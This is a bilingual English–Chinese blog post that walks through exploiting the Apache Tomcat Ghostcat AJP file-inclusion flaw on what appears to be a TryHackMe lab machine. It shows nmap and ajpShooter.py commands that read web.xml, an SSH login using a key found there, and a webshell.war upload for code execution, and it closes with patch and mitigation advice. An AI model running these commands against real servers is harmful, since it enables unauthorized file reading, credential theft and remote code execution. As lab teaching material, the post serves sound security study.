ghostcat
The Apache Ghostcat vulnerability is a file inclusion vulnerability which came out in the first quarter of this year while the world was gearing up for a lockdown fight up against the coronavirus.
Apache Ghostcat漏洞是一个文件包含漏洞,该漏洞于今年第一季度发布,而当时世界正为锁定与冠状病毒的斗争做准备。
It allows any attacker to read files such as configuration files , test files or any other tomcat directory files . In addition, if a victim website permits any user to upload files, an attacker can upload the file containing malicious JSP code to the server and then include the uploaded file by exploiting the Ghostcat vulnerability, resulting in remote code execution. Well like the coronavirus’s family of viruses this ghostcat bug has also been there since a long long time and has managed to be undiscovered until the recent past. The context of the short blog post is to comprehend, identify and exploit this notorious bug.
它允许任何攻击者读取文件,例如配置文件,测试文件或任何其他tomcat目录文件。 此外,如果受害网站允许任何用户上传文件,则攻击者可以将包含恶意JSP代码的文件上传到服务器,然后利用Ghostcat漏洞包含上传的文件,从而导致远程执行代码。 就像冠状病毒的病毒家族一样,这个幽灵猫漏洞也已经存在很长时间了,直到最近才被发现。 简短博客文章的上下文旨在理解,识别和利用这个臭名昭著的错误。
The general idea of a Tomcat server has different ports set up . There’s of course the 8080 HTTP webservice port. Then there is another lesser known port 8009 which runs the AJP (Apache JServ Protocol) service. It is essentially a service implemented through tomcat and allows for performing different operations.
Tomcat服务器的总体思路是设置了不同的端口。 当然,还有8080 HTTP Web服务端口。 然后还有另一个鲜为人知的端口8009,它运行AJP(Apache JServ协议)服务。 它本质上是通过tomcat实现的服务,并允许执行不同的操作。
What is the AJP fuss all about…?
AJP大惊小怪的是什么?
Well, the AJP is a binary protocol that reduces overhead for an application server in comparison to the HTTP. It is similar to HTTP but at a binary level. Since it is binary , the machine level translation is far more faster than the HTTP parsing. In short , AJP connector will be used due to:
好吧,AJP是一种二进制协议,与HTTP相比,它减少了应用程序服务器的开销。 它类似于HTTP,但处于二进制级别。 由于它是二进制的,因此机器级别的转换比HTTP解析要快得多。 简而言之,由于以下原因,将使用AJP连接器:
- It being implemented and exposed by default by Tomcat. 它由Tomcat默认实现和公开。
- More persistance in reverse proxying requests performance and load balancing between front end and backend application servers. 反向代理中的更多持久性要求前端和后端应用程序服务器之间的性能和负载平衡。
- Tomcat’s rich API level implementations juices the developer to push for more faster protocol transversal i.e; HTTP(S) data is seamless and can be retrieved with simple API calls(like canonical getXYX()). Tomcat丰富的API级别实现使开发人员倍受青睐,以推动更快的协议遍历。 HTTP(S)数据是无缝的,可以通过简单的API调用(例如规范的getXYX())进行检索。
- AJP allows you to skip the additional parsing and pass efficient binary interpretation of the request headers between the proxy server and the app server. AJP允许您跳过其他解析,并在代理服务器和应用程序服务器之间传递请求标头的有效二进制解释。
Ways to detect the Ghostcat vulnerability
检测Ghostcat漏洞的方法
You can use the online detection tool by the researchers that have published the finding. (Link: https://www.chaitin.cn/en/ghostcat)
您可以使用已发布发现的研究人员的在线检测工具。 (链接: https : //www.chaitin.cn/en/ghostcat )
2. The Manual way.
2.手动方式。
The Manual way of finding it:
手动查找方法:
As always in any manual penetration test we do perform an Nmap scan to detect open ports.
一如往常,在任何手动渗透测试中,我们都会执行Nmap扫描以检测开放端口。
sh-3.2# nmap -sS -sV -T2 10.10.54.51Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 23:54 ISTNmap scan report for 10.10.54.51Host is up (0.19s latency).Not shown: 996 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)53/tcp open tcpwrapped8009/tcp open ajp13 Apache Jserv (Protocol v1.3)8080/tcp open http Apache Tomcat 9.0.30Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelApache Tomcat versions 6.x, 7.x, 8.x, and 9.x are found to be vulnerable to this Ghostcat issue.
发现Apache Tomcat 6.x,7.x,8.x和9.x版本容易受到此Ghostcat问题的攻击。
Once we find the desired ports highlighted in the results above you can head to this github exploit page: https://github.com/00theway/Ghostcat-CNVD-2020-10487. and run the python exploit.
找到上面结果中突出显示的所需端口后,您可以转到以下github漏洞利用页面: https : //github.com/00theway/Ghostcat-CNVD-2020-10487 。 并运行python exploit。
sh-3.2# python3 ajpShooter.py http://10.10.54.51:8080/ 8009 /WEB-INF read[<] 302 302[<] Location: /index.txt/[<] Content-Length: 0We are able to retrieve information. Now we can try to retrieve certain common files from the WEB-INF folder such as web.xml
我们能够检索信息。 现在我们可以尝试从WEB-INF文件夹中检索某些常见文件,例如web.xml
sh-3.2# python3 ajpShooter.py http://10.10.54.51:8080/ 8009 /WEB-INF/web.xml read
[<] 200 200[<] Accept-Ranges: bytes[<] ETag: W/"1261-1583902632000"[<] Last-Modified: Wed, 21 Apr 2020 04:57:12 GMT[<] Content-Type: application/xml[<] Content-Length: 1261<?xml version="1.0" encoding="UTF-8"?><!--Licensed to the Apache Software Foundation (ASF) under one or morecontributor license agreements. See the NOTICE file distributed withthis work for additional information regarding copyright ownership.The ASF licenses this file to You under the Apache License, Version 2.0.See the License for the specific language governing permissions andlimitations under the License.--><web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaeehttp://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"version="4.0"metadata-complete="true"><display-name>Welcome to Tomcat</display-name><description>Welcome to ECorpECorp:8730281lkjlkjdqlksalks</description></web-app>We found a string (8730281lkjlkjdqlksalks)that appears as key which could possibly be used to login to system called ECorp with a key via an SSH session.
我们发现了一个字符串( 8730281lkjlkjdqlksalks ),该字符串作为密钥出现,可以用于通过SSH会话使用密钥登录到名为ECorp的系统。
sh-3.2# ssh ECorp@10.10.54.51The authenticity of host '10.10.54.51 (10.10.54.51)' can't be established.ECDSA key fingerprint is SHA256:hNxvmz+AG4q06z8p74FfXZldHr0HJsaa1FBXSoTlnss.Are you sure you want to continue connecting (yes/no)? yesWarning: Permanently added '10.10.54.51' (ECDSA) to the list of known hosts.ECorp@10.10.54.51's password: <enter the key here>Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)* Documentation: https://help.ubuntu.com* Management: https://landscape.canonical.com* Support: https://ubuntu.com/advantageThe programs included with the Ubuntu system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted byapplicable law.ECorp@ubuntu:~$ whoamiECorpE-Foundation@ubuntu:/etc$ uname -a
Linux ubuntu 4.4.0-174-generic #204-Ubuntu SMP Wed Apr 29 06:41:01 UTC 2020 x86_64 x86_64 x86_64 GNU/LinuxThat’s it we can own the system and retrieve information from the user ECorp and can also possibly look for root level escalations if there are any misconfigurations in the system.
就是这样,我们可以拥有系统并从用户ECorp检索信息,并且如果系统中有任何错误配置,还可以寻找根级别升级。
If the application server allows uploading files as well which is uncommon collectively in general , then we can upload WAR files such as :
如果应用程序服务器也允许上传通常不常见的文件,那么我们可以上传WAR文件,例如:
$ python tomcat.py upload -u tomcat -p tomcat webshell.war and gain a code execution using this issue.
并使用此问题获得代码执行。
More on it here: (https://github.com/hypn0s/AJPy/tree/3854891450e06064b50be1bad6217fd82e5c78e0)
在此处更多信息:( https://github.com/hypn0s/AJPy/tree/3854891450e06064b50be1bad6217fd82e5c78e0 )
Conclusion:
结论:
Ghostcat continues to be one of the severe issues that can be troublesome just like the coronavirus. Threat actors may mass exploit using shodan dorks as well. The suggested mitigation would be to disable the port by commenting out the block of code that enables the port to listen on 8009 using AJP connector.
像冠状病毒一样,Ghostcat仍然是可能引起麻烦的严重问题之一。 威胁参与者也可以使用Shodan Dork进行大规模利用。 建议的缓解措施是,通过注释掉使端口能够使用AJP连接器侦听8009的代码块来禁用端口。
It is also recommended to upgrade to the following Apache versions that have applied a patch:
还建议升级到以下已应用补丁程序的Apache版本:
- Apache Tomcat Version 9.0.31 Apache Tomcat版本9.0.31
- Apache Tomcat Version 8.5.51 Apache Tomcat版本8.5.51
- Apache Tomcat Version 7.0.100 Apache Tomcat 7.0.100版
For the beginners to practice such vulnerabilities there are good platforms such as TryHackme.com that have made excellent machines to solve and understand such new exploits. You can head over there and solve labs based on such vulnerabilities yourself.
对于初学者而言,可以使用TryHackme.com等出色的平台,这些平台已经成为解决和了解此类新漏洞的出色机器。 您可以直接去那里,并根据此类漏洞自行解决实验室。
Thanks for the read as always stay safe and healthy during these corona.war times :}.Peas out.
感谢您的阅读,因为在这些corona.war时期,始终保持安全健康:}。
You can connect with me on :
您可以通过以下方式与我联系:
Linkedin: www.linkedin.com/in/prakashashok22 and Twitter:https://twitter.com/prakashashok4
Linkedin: www.linkedin.com/in/prakashashok22和Twitter: https : //twitter.com/prakashashok4
翻译自: https://medium.com/@apkash8/hunting-and-exploiting-apache-ghostcat-b7446ef83e74
ghostcat
6294
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
